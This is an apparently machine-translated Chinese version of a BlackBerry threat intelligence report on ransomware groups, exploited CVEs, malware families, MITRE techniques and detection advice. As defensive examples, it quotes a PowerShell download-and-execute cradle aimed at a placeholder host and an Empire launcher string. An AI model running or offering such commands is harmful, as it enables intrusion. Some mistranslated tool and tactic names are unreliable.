破坏僵尸网络的跨国行动涉及美国、法国、德国、荷兰、英国、罗马尼亚和拉脱维亚。司法部还宣布扣押了超过 860 万美元的非法加密货币利润。
"美国加利福尼亚州南区检察官马丁-埃斯特拉达(Martin Estrada)在洛杉矶举行的新闻发布会上说:"这是美国司法部有史以来针对僵尸网络采取的最重大的技术和金融行动。
在过去 18 个月中,Qakbot 已卷入40 起勒索软件攻击事件,总共给受害者造成了 5800 多万美元的损失。BlackBerry 威胁研究与情报团队发现,Qakbot 是 2022 年最后一个季度针对医疗机构使用最频繁的木马之一,但其他行业也遭受了 Qakbot 的攻击。事实上,迄今为止,几乎所有经济部门都受到过 Qakbot 的攻击。
虽然 "猎鸭行动 "为执法部门打击广泛存在的网络威胁树立了新的里程碑,但网络安全专家警告说,网络犯罪分子所遭受的任何挫折都很可能是暂时的。此次行动没有逮捕任何人,当局也没有透露恶意软件操作者的所在地,但俄罗斯已被牵涉其中。
目前的调查被称为 "正在进行中"。
威胁行动者
黄金小屋(TA551)
作为初始访问代理(IAB),该集团的分发服务已被用作分发Ursnif、IcedID、ZLoader等已知恶意软件家族的中介,并在 2021 年成为 QakBot(又名 QBot)的 MaaS 提供商。
GOLD CABIN 通常喜欢通过钓鱼电子邮件提供密码,在加密的 ZIP 压缩文件中包含受感染的Microsoft®Word 文档的初始有效载荷。这样做是为了绕过初始电子邮件保护服务。这些文档包含基于宏的命令和指令,可通过 HTTP 发送以检索恶意有效载荷。
ALPHV (黑猫)
除了BlackCat 勒索软件本身,ALPHV 还会使用 PowerShell 禁用 Windows Defender 功能,使用PsExec攻击 Active Directory 账户,使用CobaltStrike进行横向移动,使用 ExMatter 进行数据外渗,并删除目标文件的阴影副本以防止数据恢复。
本季度,BlackCat 活动仍在继续,影响了美国州政府、医疗保健公司、赌场等。2023 年 12 月,FBI 和 CISA 发布了一份联合网络安全公告,估计 ALPHV 的关联公司已使用 BlackCat 勒索软件入侵了 1000 多个实体,收取了约 3 亿美元的赎金。
Change Healthcare 是一家收入和支付周期管理提供商,每年在美国医疗保健系统中处理 150 亿笔医疗保健交易。这次勒索软件攻击是多年来破坏性最大的一次,引发的中断对药房、医院和患者的影响持续了一个多星期。
虽然有报道称该组织将基础设施被攻陷的责任 "归咎于联邦调查局",但该组织的领导者有可能是故意下线的。一些专家认为,这可能是内部争斗或退出骗局在作祟,威胁组织的操作人员从中获利,并抛弃了较低级别的分支机构。还有人推测,该组织可能正在重塑品牌,并将重新开展业务,试图逃避执法。
勒索软件组织越来越多地以医疗保健行业为目标,这一正在发展中的事件是这一令人不安趋势的最新例证。美国卫生与公众服务部(HSS)指出,此次事件 "提醒人们注意国内医疗保健生态系统的相互关联性,以及加强整个生态系统网络安全复原力的紧迫性"。
8Base
8Base 公司主要活跃在北美和拉丁美洲,在 2023 年中期活动量激增。他们的主要目标是中小型公司,涉及的行业越来越多。最值得注意的是,8Base 与 Clop 和 LockBit 一起,仅在 2023 年 7 月就造成了所有记录在案的网络攻击中的48%。
2023 年 10 月,8Base 被发现以美国的一家医疗机构为目标,突显了其对医疗保健和公共卫生 (HPH) 行业的潜在威胁。在攻击过程中,8Base 会在部署勒索软件之前滥用离岸二进制文件和脚本(LOLBAS)。尽管该组织在其泄密网站上将自己描述为 "诚实而简单的五步程序员",但该组织不断增加的受害者数量和咄咄逼人的攻击手段却让人看到了一幅更为复杂的图景。值得注意的是,该组织尚未将前苏联或独立国家联合体(CIS)国家作为攻击目标,而这往往是许多俄语威胁行为者的标志。
工具
米米卡兹
Metasploit 框架
钴罢工
CVEs:影响和统计数据
由 MITRE 公司维护的 "常见漏洞和暴露"(Common Vulnerabilities and Exposures,CVE)系统是一个公开已知漏洞和暴露的信息目录。CVE 系统由美国国土安全部 (DHS) 和 CISA 赞助。
在本报告所述期间,Cisco®、Apache®、Citrix® 和JetBrains®产品中发现了新的漏洞。这些漏洞的缓解方法已经公布,但某些威胁行为者仍在充分利用未打补丁的系统。
趋势 CVE
思科 ASA 和 FTD 漏洞
CVE-2023-20269(9.1 关键)
未授权访问
思科的 ASA 和 FTD在 VPN 功能中都存在一个漏洞,允许威胁者对现有账户进行暴力攻击。据报道,LockBit 和 Akira勒索软件组织利用了这个 CVE。
WinRAR 漏洞
CVE-2023-38831(7.8 高)
任意代码执行
6.23 版之前的 RARLAB WinRAR 存在漏洞,攻击者在查看 .ZIP 归档文件时可执行任意代码。据报道,该漏洞已被各种威胁组织滥用,包括那些有政府支持的组织,他们部署了各种商品恶意软件。
JetBrains TeamCity 漏洞
CVE-2023-42793(9.8 严重)
身份验证绕过
在 TeamCity Server 上存在导致 RCE 的身份验证绕过。据报道,多个朝鲜威胁分子利用了这个 CVE。今年 9 月,根据CISA 的咨询,俄罗斯的APT29威胁组织也发现了该漏洞。
F5 BIG-IP 配置实用程序漏洞
CVE-2023-46747(9.8 关键)
远程代码执行
允许拥有 BIG-IP 系统网络访问权限的攻击者执行任意系统命令的漏洞。F5 自己的安全公告称,他们已观察到威胁行为者使用该漏洞。
SysAid 零日
CVE-2023-47246(9.8 关键型)
未授权代码执行
IT服务管理(ITSM)存在路径遍历漏洞,攻击者成功将文件写入Tomcat Webroot(88)后,该漏洞会导致代码执行。该漏洞的零日滥用可用于部署Clop 勒索软件。
思杰出血
CVE-2023-4966(9.4 临界值)
缓冲区溢出
影響 Citrix NetScaler ADC 及 NetScaler Gateway。包含緩衝記憶體滿溢漏洞,當配置為閘道時,可導致敏感資料外洩。在本報告期間,LockBit 利用 Citrix Bleed 漏洞。
Apache OFBiz 18.12.09 漏洞
CVE-2023-49070(9.8 critical);CVE-2023-51467(9.8 critical)
远程代码执行
Apache OFBiz 18.12.09 中的 Pre-auth RCE。对 CVE-2023-49070 的初步修复导致在 Apache OFBiz 中发现另一个新的 CVE -- CVE-2023-51467。第二个漏洞允许攻击者绕过登录过程并远程执行任意代码。
统计资料
常见威胁视窗
雷姆科斯
远程访问木马
Remcos 是一种用于远程访问受害者设备的软件。在俄罗斯入侵乌克兰的整个过程中,它被越来越多地使用。
特斯拉特工
信息窃取者
Agent Tesla 是一种 .NET 恶意软件,主要用于收集凭证。
红线
信息窃取者
RedLine 被用来窃取已保存的凭证、自动完成数据、信用卡信息和其他有价值的数据。
Emotet
下载器
Emotet 不断发展,目前主要用作基础设施和内容交付即服务。
RisePro
信息窃取者
在本报告所述期间,RisePro 最近进行了一次升级。
私有加载器
下载器
PrivateLoader 是一种模块化恶意软件,用于下载和执行有效载荷。
LummaStealer
信息窃取者
LummaStealer 采用 MaaS 模式,主要针对加密货币钱包和双因素验证浏览器扩展。
浣熊/破纪录者
信息窃取者
在 2023 年初停运之后,《浣熊》的开发者在去年下半年又推出了新版本。
BC 系统
代理机器人
SystemBC 用于建立一个 SOCKS5 代理,返回其 C2。
达纳机器人
信息窃取者
DanaBot 的重点是窃取信息。不过,由于它是模块化的,因此可用于其他目的,如下载和执行其他有效载荷。它在 2023 年下半年更新了新版本。
普遍威胁Linux
NoaBot/Mirai
分布式拒绝服务(DDoS)
NoaBot 是 Mirai 僵尸网络的一个新变种。与以前的 Mirai 不同,NoaBot 使用 SSH 而不是 Telnet 来传播恶意软件。在某些情况下,人们还看到 NoaBot 部署了改进版的 XMRig 矿工。
XMRig 矿工
加密货币矿工
在本报告所述期间,我们遥测到的 Linux 服务器面临的第二大威胁是针对 Monero 的 XMRig 矿工。它使威胁行为者能够在受害者不知情的情况下使用其系统挖掘加密货币。
Looney Toonables
利用
尽管没有出现在我们的遥测数据中,但本季度一个值得注意的 Linux 威胁是名为 Looney Toonables(也称为CVE-2023-4911)的有趣漏洞。这是 GNU C 库的 ld.so 动态加载器中的一个缓冲区溢出漏洞,可使本地攻击者获得 root 权限。
普遍威胁MacOS
原子窃取器
信息窃取者
感染载体是一个虚假广告,诱骗用户下载一个虚假应用程序。Atomic Stealer 的目标是密码、浏览器 cookie 和自动填充数据、加密钱包和 Mac® 钥匙串数据。
XLoader
信息窃取者
恶意软件最初是通过木马化的 Microsoft Office 应用程序发送的。XLoader 会捕获浏览器和剪贴板信息,这些信息可用于进一步入侵目标。
锈桶
信息窃取者
初始有效载荷可能通过钓鱼电子邮件发送。它具有 C2 功能,但恶意软件的主要目的是窃取加密资产。
JaskaGO
信息窃取者
该恶意软件使用开源编程语言 Go 构建和编译,可针对 Windows 和 Mac 操作系统。JaskaGO 具有 C2 功能,可从受感染设备中渗出浏览器数据、加密资产和文件。
普遍威胁:安卓
间谍笔记
信息窃取/远程访问木马
利用 Android™ 辅助功能服务捕捉用户数据并将其发送至 C2 服务器。
变色龙
银行木马
Chameleon 的一个新变种通过暗网平台 Zombinder 发布。它滥用安卓辅助功能服务来获取用户信息。新版本包括绕过生物识别阅读器和显示 HTML 页面的功能,以引导用户启用辅助功能服务。
峡湾幻影
银行木马
FjordPhantom 通过嵌入式虚拟化解决方案使用虚拟容器来封装银行应用程序。这样,攻击者就可以通过大量使用挂钩框架来冒充合法的银行应用程序。
行星间风暴/IPStorm
信息窃取器/机器人网络
IPStorm 的新 Go 变种可通过强制 SSH 进行传播。它还能打开安卓调试桥服务器。IPFS p2p 网络用于节点通信。
MITRE 常用技术
了解威胁组织的高级技术有助于决定哪些检测技术应优先使用。在本报告所述期间,BlackBerry 观察到威胁行为者正在使用以下前 20 种 MITRE 技术。
最后一栏中的向上箭头表示自上次报告以来该技术的使用有所增加。向下箭头表示自上次报告以来使用率有所下降。等号(=)表示该技术与上次报告中的位置相同。
| 技术名称 | 技术 ID | 战术 | 最新报告 | 改变 |
|---|---|---|---|---|
|
工艺注入
|
T1055
|
权限升级
|
NA
|
↑
|
|
输入捕捉
|
T1056
|
收藏品
|
NA
|
↑
|
|
发现系统信息
|
T1082
|
发现
|
3
|
↓
|
|
DLL 侧加载
|
T1574.002
|
坚持不懈
|
12
|
↑
|
|
非应用层协议
|
T1095
|
命令与控制
|
14
|
↑
|
|
应用层协议
|
T1071
|
命令与控制
|
10
|
↑
|
|
命令和脚本解释器
|
T1059
|
执行
|
9
|
↑
|
|
预定任务/工作
|
T1053
|
权限升级
|
NA
|
↑
|
|
注册表运行键值/启动文件夹
|
T1547.001
|
坚持不懈
|
NA
|
↑
|
|
伪装
|
T1036
|
防御回避
|
6
|
↓
|
|
通过可移动媒体复制
|
T1091
|
横向移动
|
NA
|
↑
|
|
视窗服务
|
T1543.003
|
坚持不懈
|
NA
|
↑
|
|
文件和目录发现
|
T1083
|
发现
|
11
|
↓
|
|
视窗管理工具
|
T1047
|
执行
|
19
|
↑
|
|
远程系统发现
|
T1018
|
发现
|
5
|
↓
|
|
虚拟化/
沙盒规避 |
T1497
|
防御回避
|
3
|
↓
|
|
玷污共享内容
|
T1080
|
横向移动
|
NA
|
↑
|
|
禁用或修改工具
|
T1562.001
|
防御回避
|
7
|
↓
|
|
过程探索
|
T1057
|
发现
|
4
|
↓
|
|
对数据进行加密以产生影响
|
T1486
|
影响
|
NA
|
↑
|
| 技术 ID | |
|---|---|
| 工艺注入 |
T1055
|
| 输入捕捉 |
T1056
|
| 发现系统信息 |
T1082
|
| DLL 侧加载 |
T1574.002
|
| 非应用层协议 |
T1095
|
| 应用层协议 |
T1071
|
| 命令和脚本解释器 |
T1059
|
| 预定任务/工作 |
T1053
|
| 注册表运行键值/启动文件夹 |
T1547.001
|
| 伪装 |
T1036
|
| 通过可移动媒体复制 |
T1091
|
| 视窗服务 |
T1543.003
|
| 文件和目录发现 |
T1083
|
| 视窗管理工具 |
T1047
|
| 远程系统发现 |
T1018
|
|
虚拟化/ 沙盒规避 |
T1497
|
| 玷污共享内容 |
T1080
|
| 禁用或修改工具 |
T1562.001
|
| 过程探索 |
T1057
|
| 对数据进行加密以产生影响 |
T1486
|
| 战术 | |
|---|---|
| 工艺注入 |
权限升级
|
| 输入捕捉 |
收藏品
|
| 发现系统信息 |
发现
|
| DLL 侧加载 |
坚持不懈
|
| 非应用层协议 |
命令与控制
|
| 应用层协议 |
命令与控制
|
| 命令和脚本解释器 |
执行
|
| 预定任务/工作 |
权限升级
|
| 注册表运行键值/启动文件夹 |
坚持不懈
|
| 伪装 |
防御回避
|
| 通过可移动媒体复制 |
横向移动
|
| 视窗服务 |
坚持不懈
|
| 文件和目录发现 |
发现
|
| 视窗管理工具 |
执行
|
| 远程系统发现 |
发现
|
|
虚拟化/ 沙盒规避 |
防御回避
|
| 玷污共享内容 |
横向移动
|
| 禁用或修改工具 |
防御回避
|
| 过程探索 |
发现
|
| 对数据进行加密以产生影响 |
影响
|
| 最新报告 | |
|---|---|
| 工艺注入 |
NA
|
| 输入捕捉 |
NA
|
| 发现系统信息 |
3
|
| DLL 侧加载 |
12
|
| 非应用层协议 |
14
|
| 应用层协议 |
10
|
| 命令和脚本解释器 |
9
|
| 预定任务/工作 |
NA
|
| 注册表运行键值/启动文件夹 |
NA
|
| 伪装 |
6
|
| 通过可移动媒体复制 |
NA
|
| 视窗服务 |
NA
|
| 文件和目录发现 |
11
|
| 视窗管理工具 |
19
|
| 远程系统发现 |
5
|
|
虚拟化/ 沙盒规避 |
3
|
| 玷污共享内容 |
NA
|
| 禁用或修改工具 |
7
|
| 过程探索 |
4
|
| 对数据进行加密以产生影响 |
NA
|
| 改变 | |
|---|---|
| 工艺注入 |
↑
|
| 输入捕捉 |
↑
|
| 发现系统信息 |
↓
|
| DLL 侧加载 |
↑
|
| 非应用层协议 |
↑
|
| 应用层协议 |
↑
|
| 命令和脚本解释器 |
↑
|
| 预定任务/工作 |
↑
|
| 注册表运行键值/启动文件夹 |
↑
|
| 伪装 |
↓
|
| 通过可移动媒体复制 |
↑
|
| 视窗服务 |
↑
|
| 文件和目录发现 |
↓
|
| 视窗管理工具 |
↑
|
| 远程系统发现 |
↓
|
|
虚拟化/ 沙盒规避 |
↓
|
| 玷污共享内容 |
↑
|
| 禁用或修改工具 |
↓
|
| 过程探索 |
↓
|
| 对数据进行加密以产生影响 |
↑
|
BlackBerry 威胁研究和情报团队利用MITRE D3FEND,针对本报告期内观察到的技术制定了一份完整的反措施清单,该清单可在我们的公共 GitHub 上查阅。
前三种技术是众所周知的,被对手用来收集关键信息以成功实施攻击。在 "应用对策 "部分,将举例说明这些技术的使用方法和需要监控的有用信息。
这些技术和战术的影响如下图所示:
应用对策
进程注入是一种常见的防御规避技术,当恶意代码被放置在另一个正在运行的进程的地址空间中时,就会被利用。
下面是一系列本地 Windows 函数,通过将它们注入进程,可以滥用这些函数。
按顺序调用的功能(因攻击而异):
- VirtualAlloc(Ex) - 在进程中分配内存
- WriteProcessMemory() - 在分配的内存中写入恶意代码
- VirtualProtect - 重新保护具有可执行权限的内存
- CreateRemoteThread() - 在另一个进程的上下文中执行恶意代码
攻击者利用定制的信息窃取软件,通过监控图形用户界面(GUI)或记录击键来记录用户对被入侵系统的输入。
BlackBerry 发现,通过监控执行任何形式的输入捕获的异常进程,可以成功识别和修复威胁。
BlackBerry 定义为 "异常 "的常见行为包括无效签名、从非典型父进程生成的子进程以及特定的 Windows API 函数调用。
要监控的函数调用:
- SetWindowsHook(Ex) - 监控桌面输入等事件
- GetKeyboardState() - 获取虚拟按键的当前状态
- GetKeyState() - 获取虚拟键的当前状态
- GetAsyncKeyState() - 获取虚拟键的当前状态
从被入侵的系统中枚举系统信息,可为威胁行为者提供进一步识别弱点和潜在利用载体的环境,从而提升权限并不受限制地访问系统。
通过创建整个网络的共同行为基线并观察异常值,网络安全专业人员可以观察到任何异常情况。
通过滥用 Windows Management Instrumentation (WMI),威胁行为者可以找到有关防病毒软件、逻辑磁盘和用户的信息,从而确定攻击者可以利用的支点或感兴趣/薄弱环节。然而,对于大多数用户来说,这种调用相对来说是非常规的。监控这些调用的发生可能会识别出受害者系统中的恶意行为者或恶意软件。
以下是可能对监控有用的命令行:
- SELECT * FROM AntiVirusProduct - 用于枚举系统中存在的防病毒产品的 WMI 命令行
- wmic OS get OSArchitecture, Version - 利用 WMI 枚举系统版本信息
- systeminfo - 向用户提供系统信息
- driverquery /v - 列出系统中已安装的驱动器
攻击者可能会利用动态链接库(DLL)的搜索顺序来执行自己的恶意代码。他们的做法是将恶意有效载荷和受害者的合法应用程序放在一起。之后,只要运行合法的可执行文件,就会加载恶意二进制文件,而系统的正常搜索顺序则会被攻击者利用。
此外,应仔细监控 Windows Side-by-Side (SxS) 和系统文件夹等系统位置,以便删除和替换 DLL,因为更高级的对手会试图躲避现代防病毒/端点检测和响应 (EDR) 解决方案。
识别 DLL 侧载的常用方法是监控从回收站、临时文件夹和普通系统路径等异常位置加载模块的情况。
通过使用非应用层协议,敌方试图躲避为检测恶意行为而进行微调的成熟防御系统。从缓解和预防的角度来看,应针对 C2 通信监控 ICMP 等不常用的协议。
BlackBerry 客户可以采取的一种安全且可降低风险的方法是创建自定义规则来监控网络层上的特定字符串,并将这些规则与更先进的行为检测规则结合使用。通过将预防措施与充分的安全存在结合起来,BlackBerry 客户和防御者都可以降低攻击的易感性并提高安全意识。
CylanceGUARD 数据
报告的这一部分重点介绍了在 CylanceGUARD®客户环境中发现的最有趣的威胁检测。
CylanceGUARD 是一项基于订阅的托管检测和响应 (MDR) 服务,提供全天候监控,帮助企业阻止在客户安全计划中寻找漏洞的复杂网络威胁。BlackBerry MDR 团队在本报告期内跟踪了数千个警报。下面,我们将按地区对遥测数据进行细分,以便深入了解当前的威胁状况。
CylanceGUARD 意见
在上一份报告中,CylanceGUARD 团队发现,在BlackBerry 有客户的所有地区,"通用文件存档外渗暂存 "技术都被滥用。但是,在本报告期内,我们记录了所有地区的 PowerShell 检测模式。
在 EMEA 和 NALA 地区,CylanceGUARD 团队注意到与PowerShell Empire- "Possible Empire Encoded Payload" - 有关的检测有所增加。PowerShell Empire 是一个开源的漏洞后框架,通常被攻击者和合法渗透测试人员/红队使用。
Empire 框架主要侧重于使用 PowerShell 脚本语言攻击 Windows 环境。这样,攻击者就可以与受害者的机器进行通信,从 C2 服务器收发命令和信息。
帝国的一个早期指标是检测到一条命令,如
"powershell -nop -sta -w 1 -enc." 这是 Empire HTTP 监听器的默认启动器字符串。
请注意,攻击者更改或混淆该值的难度很大。不过,在很多情况下,这个值是不会改变的,因此对于检测团队和安全运行中心 (SOC) 分析人员来说,它是一个有效的签名。
在亚太地区,我们发现最常见的威胁已从 "凭证访问"(TA0006)转变为 "执行"(TA0002)。PowerShell 再次成为我们检测到的主要威胁。MITRE 观察到的相关技术是命令和脚本解释器:PowerShell(T1059.001)。在我们的调查过程中,最常观察到的威胁行为者使用的模式是下载摇篮--这是一种用于下载和代码执行的单一命令。
例如
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('hxxp://x.x.x.x/test[.]exe')
- 这将从可能的 C2 服务器下载并执行 test.exe 文件。
PowerShell 在我们的客户环境中被大量检测到的模式突出表明,确保组织具备适当的可见性和控制措施以限制与 PowerShell 相关的滥用非常重要。
作为CylanceGUARD 产品的一部分,我们的入职团队(称为ThreatZERO®顾问)与客户密切合作,确保将其设备置于脚本控制块 (SCB - PS) 等推荐策略中,以限制攻击者滥用 PowerShell 等实用程序的能力。
观察到的活动
本表突出显示了本报告期内记录到的恶意或可疑命令的常见趋势(已消毒)。
在上一份报告中,我们讨论了如何通过监控 PowerShell 的使用来检测客户环境中的恶意活动。然而,还有一些其他 LOLBAS 工具通常会被威胁行为者滥用或误用。
简单来说,LOLBAS 指的是已经成为系统一部分的工具,可以被恶意滥用。
下图显示了我们在本报告期内观察到的五大可采取行动的检测。
结论
通过这份为期 120 天的报告,我们BlackBerry 为网络安全行业充满挑战的一年画上了句号。通过将我们单一的年度《全球威胁情报报告》分解为季度出版物,我们的新形式为不断变化的数字环境提供了更深入的最新研究和可操作的见解。
以下是我们的四大主要收获:
在本报告所述期间,BlackBerry 注意到,针对我们客户的被阻止攻击和独特哈希值连续第二年增加。这表明威胁行为者在攻击非常具体的高价值目标时付出了巨大努力。在 2023 年的最后几个月中,每分钟阻止的攻击增加了 19%(每分钟 31 次攻击),每分钟独特哈希值增加了 27%(每分钟 3.7 个哈希值)。
BlackBerry 我们的网络安全解决方案阻止了 200 多万次针对关键基础设施领域客户的网络攻击。此外,我们还阻止了 100 多万次针对商业企业客户的攻击。我们还注意到大规模 MaaS 威胁的持续扩散,如 RedLine、RisePro 和 LummaStealer,它们通常通过地下论坛和非法暗网市场出售。在本报告期内,在这两个行业中都发现了高比例的商品下载器和信息窃取恶意软件。
我们在上一份报告中预测,威胁行为者(即勒索软件集团)将 CVE 快速武器化并加以利用。例如,LockBit 勒索软件组织利用了关键的 "Citrix Bleed "漏洞,Clop 勒索软件组织滥用了 SysAid 零日漏洞。2023 年,勒索软件组织在全球范围内造成了价值数千万美元的损失。最终,2024 年很可能会发生类似的变化,因为这些组织会迅速改变其攻击方式并开发其 TTPs,以最大限度地发挥其潜在影响。
特权升级、收集和发现是报告期间观察到的恶意样本中最常滥用的 MITRE ATT&CK 战术。优先检测网络中的这些策略至关重要。通过了解这些 TTP 和威胁行为者特征,防御者可以大大降低攻击的影响,并有助于威胁猎取、事件响应和恢复工作。
预测
在全球即将举行的选举中扩大使用 Deepfake 技术
2024 年是政治格局中重要的一年,全球各国将举行50 多场全国大选。选举期间往往充斥着错误信息和虚假信息的宣传,而今年几乎肯定会带来这两种信息的大量涌现。
我们预测,这其中最主要的是不良行为者滥用 Deepfake 技术。由 LLM 支持的 Deepfake 技术允许恶意行为者以照片、音频或多媒体的形式创建高度逼真、虚假、故意误导的媒体。这些内容可以是伪造或篡改的演讲,也可以是经过篡改的知名政治人物的视频或音频片段。这些深度伪造的内容将通过各种社交媒体渠道和消息应用程序进行战略性传播。
巴西犯罪集团将注意力转移到网络钓鱼和与像素相关的欺诈行为上
我们相信,巴西的网络犯罪团伙将改变策略,更加专注于创建钓鱼网站,引诱受害者通过 PIX(一种即时免费的支付方式)进行支付转账,这种情况有时会发生在全球最猖獗的网络犯罪团伙身上。这在汽车纳税季节已经开始,犯罪分子滥用搜索引擎来显示欺诈性钓鱼网页,其中包括有效的车辆和车主数据,(理论上)只有政府才能访问这些数据。随着数据泄露越来越普遍,此类活动很可能会继续下去。
VPN 设备仍将是国家威胁行为者极具吸引力的目标
由于多种原因,包括 VPN 设备在内的面向互联网的系统将继续成为恶意民族国家威胁行为者的最佳目标。放置在网络关键部分的设备可能没有防病毒或 EDR 代理等传统安全软件,因此很难检测到入侵,尤其是在使用零日攻击时。此外,VPN 设备通常在威胁者进入网络后才会被发现,因此很难消除威胁。在出现更有效、回报更高的选择之前,针对 VPN 设备的攻击仍将是民族国家威胁行为者访问目标网络的一个非常有效的选择。
预计供应链攻击会增加
我们预测,随着 2024 年的到来,供应链攻击将会增加。这是因为供应链网络极其复杂,而且这些漏洞的影响范围更广,因此成为威胁行为者所希望的攻击载体。这些攻击可能针对供应链软件,也可能针对设备和路由器等硬件。企业需要了解其供应链合作伙伴的安全状况,并应制定检测和缓解计划来应对此类攻击。
亚太地区的攻击事件将继续增加
我们预计,来自朝鲜支持的组织对美国、韩国和日本的攻击将会增加。随着与西方结盟的国家继续合作应对该地区最活跃的两个国家--中国和朝鲜--发起的网络威胁,我们很可能会看到更多出于经济动机的攻击(朝鲜利用这些攻击来逃避制裁),以及传统网络间谍活动的增加。日本国家安全顾问秋叶武夫(Takeo Akiba)说,朝鲜的 "非法网络活动 "仍然是该国发展核导弹的 "资金来源"。朝鲜此前一直否认有关黑客攻击或其他网络攻击的指控。
致谢
本报告凝聚了我们优秀团队和个人的共同努力。我们要特别感谢
阿德里安-钱伯斯
阿马尔坎特-拉文德兰
戴维-赫加蒂
Dean Given
Geoff O'Rourke
伊斯梅尔-巴伦苏埃拉-埃斯佩霍
雅各布-费雷斯
约翰-德布尔
克里斯托弗-范德库克
纳塔利娅-卡波尼
娜塔莎-罗纳
帕特里克-马蒂西克
佩德罗-德里梅尔
罗纳德-韦尔奇
特拉维斯-霍克斯梅尔
威廉-约翰逊